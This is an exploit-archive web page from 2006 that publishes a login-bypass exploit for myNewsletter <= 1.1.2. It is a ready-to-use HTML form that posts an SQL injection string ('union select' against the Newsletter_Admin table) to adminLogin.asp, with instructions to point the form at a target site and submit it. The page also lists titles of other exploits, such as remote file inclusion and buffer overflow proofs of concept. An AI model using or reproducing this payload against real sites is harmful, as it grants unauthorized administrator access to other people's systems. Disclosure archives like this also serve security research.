exploits , vulnerabilities , articles , myNewsletter <= 1.1.2 (adminLogin.asp) Login Bypass Exploit

2007-04-06 phpMyNewsletter <= 0.8 (beta5) Multiple Vuln Exploit
2007-04-04 phpMyNewsletter 0.6.10 (customize.php l) RFI Vulnerability

2006-06-06

myNewsletter <= 1.1.2 (adminLogin.asp) Login Bypass Exploit

Rated as : Moderate Risk

<!-- orginal advisory : http://www.kapda.ir/advisory-340.html -->
<html><center><h4>KAPDA.ir --- myNewsletter <= 1.1.2
Login bypass exploit</h4><br>change action in source and then
submit
</center><form name="adminLogin"
method="post"
action="http://site/newsletter/adminLogin.asp">
<input type="hidden" name="UserName"
value="<!--'union select 1 from Newsletter_Admin where
''='">
<input type="hidden" name="Password"
value="1">
<center><br><input type="submit"
name="Submit"
value="Login"></center><br><br>
<!-- Discovered and coded by FarhadKey / email : farhadkey [aT} kapda
{D0T} net -->
<center><a
href="http://www.kapda.ir">www.kapda.ir</a></center>
</form>
</html>
securitydot.net - 2006-06-06

Exploits - newest 10 RSS | More

2007-06-15 56114 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 33411 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 41550 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 28774 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19307 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16324 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 18960 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16205 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33021 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 16840 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit